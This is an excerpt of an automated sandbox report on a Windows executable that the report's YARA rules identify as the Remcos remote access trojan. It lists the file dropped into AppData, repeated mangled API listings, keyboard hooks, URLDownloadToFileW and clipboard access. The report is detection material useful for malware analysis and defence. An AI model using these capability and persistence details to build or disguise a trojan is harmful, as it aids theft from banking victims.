          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait7_2_0040D2A6
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait7_2_0040D2A6
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701101686.000000000140B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,7_2_0040532D
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,25_2_0040532D

          E-Banking Fraud:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          .NET source code contains very large stringsShow sources
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 1.0.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: PxxoServicesTrialNet1.exe.7.dr, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 7.0.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.1.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 15.2.PxxoServicesTrialNet1.exe.8e0000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 15.0.PxxoServicesTrialNet1.exe.8e0000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 16.0.PxxoServicesTrialNet1.exe.fd0000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 16.2.PxxoServicesTrialNet1.exe.fd0000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 23.0.PxxoServicesTrialNet1.exe.320000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 23.2.PxxoServicesTrialNet1.exe.320000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 24.0.PxxoServicesTrialNet1.exe.530000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 24.2.PxxoServicesTrialNet1.exe.530000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 25.2.PxxoServicesTrialNet1.exe.870000.1.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: 25.0.PxxoServicesTrialNet1.exe.870000.0.unpack, ??????????????????????????????????????/????????????????.csLong String: Length: 890043
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014EBC60 NtSetInformationThread,15_2_014EBC60
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_0192BC60 NtSetInformationThread,16_2_0192BC60
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_0103BC60 NtSetInformationThread,24_2_0103BC60
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait7_2_0040D2A6
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEP